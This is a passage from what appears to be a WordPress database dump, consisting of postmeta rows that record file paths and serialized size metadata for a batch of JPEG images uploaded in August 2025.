eight\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:73917;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:39:\"LINE_ALBUM_12868_250813_35-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:229125;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_35-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19198;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5488,1958,'_wp_attached_file','2025/08/LINE_ALBUM_12868_250813_34.jpg'),
(5489,1959,'_wp_attached_file','2025/08/LINE_ALBUM_12868_250813_37.jpg'),
(5490,1958,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:38:\"2025/08/LINE_ALBUM_12868_250813_34.jpg\";s:8:\"filesize\";i:375245;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_34-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15229;}s:5:\"large\";a:5:{s:4:\"file\";s:39:\"LINE_ALBUM_12868_250813_34-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:116630;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_34-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7910;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_34-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:72468;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:39:\"LINE_ALBUM_12868_250813_34-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:220491;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_34-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18923;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5491,1959,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:38:\"2025/08/LINE_ALBUM_12868_250813_37.jpg\";s:8:\"filesize\";i:414529;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_37-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15489;}s:5:\"large\";a:5:{s:4:\"file\";s:39:\"LINE_ALBUM_12868_250813_37-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:124573;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_37-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7726;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_37-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:76486;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:39:\"LINE_ALBUM_12868_250813_37-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:239086;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_37-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18384;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5492,1960,'_wp_attached_file','2025/08/LINE_ALBUM_12868_250813_33.jpg'),
(5493,1960,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:38:\"2025/08/LINE_ALBUM_12868_250813_33.jpg\";s:8:\"filesize\";i:382802;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_33-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15482;}s:5:\"large\";a:5:{s:4:\"file\";s:39:\"LINE_ALBUM_12868_250813_33-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:119320;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_33-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7911;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_33-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:73734;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:39:\"LINE_ALBUM_12868_250813_33-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:224949;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_33-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19368;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5494,1961,'_wp_attached_file','2025/08/LINE_ALBUM_12868_250813_32.jpg'),
(5495,1961,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:38:\"2025/08/LINE_ALBUM_12868_250813_32.jpg\";s:8:\"filesize\";i:379227;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_32-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14494;}s:5:\"large\";a:5:{s:4:\"file\";s:39:\"LINE_ALBUM_12868_250813_32-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:114291;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_32-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7657;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_32-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:70760;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:39:\"LINE_ALBUM_12868_250813_32-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:218680;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_32-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18123;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5496,1962,'_wp_attached_file','2025/08/LINE_ALBUM_12868_250813_31.jpg'),
(5497,1962,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:38:\"2025/08/LINE_ALBUM_12868_250813_31.jpg\";s:8:\"filesize\";i:380139;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_31-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14625;}s:5:\"large\";a:5:{s:4:\"file\";s:39:\"LINE_ALBUM_12868_250813_31-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:113942;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_31-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7835;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_31-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:70518;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:39:\"LINE_ALBUM_12868_250813_31-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:218388;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_31-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18049;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5498,1963,'_wp_attached_file','2025/08/LINE_ALBUM_12868_250813_29.jpg'),
(5499,1963,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:38:\"2025/08/LINE_ALBUM_12868_250813_29.jpg\";s:8:\"filesize\";i:360677;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_29-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13549;}s:5:\"large\";a:5:{s:4:\"file\";s:39:\"LINE_ALBUM_12868_250813_29-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:107236;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_29-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7645;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_29-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:65530;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:39:\"LINE_ALBUM_12868_250813_29-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:206033;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_29-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17008;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5500,1965,'_wp_attached_file','2025/08/LINE_ALBUM_12868_250813_30.jpg'),
(5501,1964,'_wp_attached_file','2025/08/LINE_ALBUM_12868_250813_28.jpg'),
(5502,1965,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:38:\"2025/08/LINE_ALBUM_12868_250813_30.jpg\";s:8:\"filesize\";i:365020;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_30-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13870;}s:5:\"large\";a:5:{s:4:\"file\";s:39:\"LINE_ALBUM_12868_250813_30-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:109257;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_30-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7585;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_30-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:67479;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:39:\"LINE_ALBUM_12868_250813_30-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:209640;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_30-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17415;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5503,1964,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:38:\"2025/08/LINE_ALBUM_12868_250813_28.jpg\";s:8:\"filesize\";i:371556;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_28-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14799;}s:5:\"large\";a:5:{s:4:\"file\";s:39:\"LINE_ALBUM_12868_250813_28-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:114973;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_28-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7808;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_28-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:70811;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:39:\"LINE_ALBUM_12868_250813_28-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:217688;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_28-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18421;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5504,1966,'_wp_attached_file','2025/08/LINE_ALBUM_12868_250813_26.jpg'),
(5505,1966,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:38:\"2025/08/LINE_ALBUM_12868_250813_26.jpg\";s:8:\"filesize\";i:424618;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_26-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15920;}s:5:\"large\";a:5:{s:4:\"file\";s:39:\"LINE_ALBUM_12868_250813_26-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:126223;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_26-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8402;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_26-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:77521;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:39:\"LINE_ALBUM_12868_250813_26-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:241989;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_26-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19616;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5506,1967,'_wp_attached_file','2025/08/LINE_ALBUM_12868_250813_27.jpg'),
(5507,1967,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:38:\"2025/08/LINE_ALBUM_12868_250813_27.jpg\";s:8:\"filesize\";i:355910;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_27-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13317;}s:5:\"large\";a:5:{s:4:\"file\";s:39:\"LINE_ALBUM_12868_250813_27-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:103578;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_27-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7003;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_27-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:63595;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:39:\"LINE_ALBUM_12868_250813_27-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:200332;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_27-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16060;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5508,1968,'_wp_attached_file','2025/08/LINE_ALBUM_12868_250813_25.jpg'),
(5509,1968,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:38:\"2025/08/LINE_ALBUM_12868_250813_25.jpg\";s:8:\"filesize\";i:415625;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_25-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15926;}s:5:\"large\";a:5:{s:4:\"file\";s:39:\"LINE_ALBUM_12868_250813_25-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:126446;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_25-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8454;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_25-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:77949;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:39:\"LINE_ALBUM_12868_250813_25-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:240467;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_25-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19612;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5510,1969,'_wp_attached_file','2025/08/LINE_ALBUM_12868_250813_23.jpg'),
(5511,1969,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:38:\"2025/08/LINE_ALBUM_12868_250813_23.jpg\";s:8:\"filesize\";i:434647;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_23-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17190;}s:5:\"large\";a:5:{s:4:\"file\";s:39:\"LINE_ALBUM_12868_250813_23-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:132243;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_23-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8143;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_23-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:81499;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:39:\"LINE_ALBUM_12868_250813_23-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:250751;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_23-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20794;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
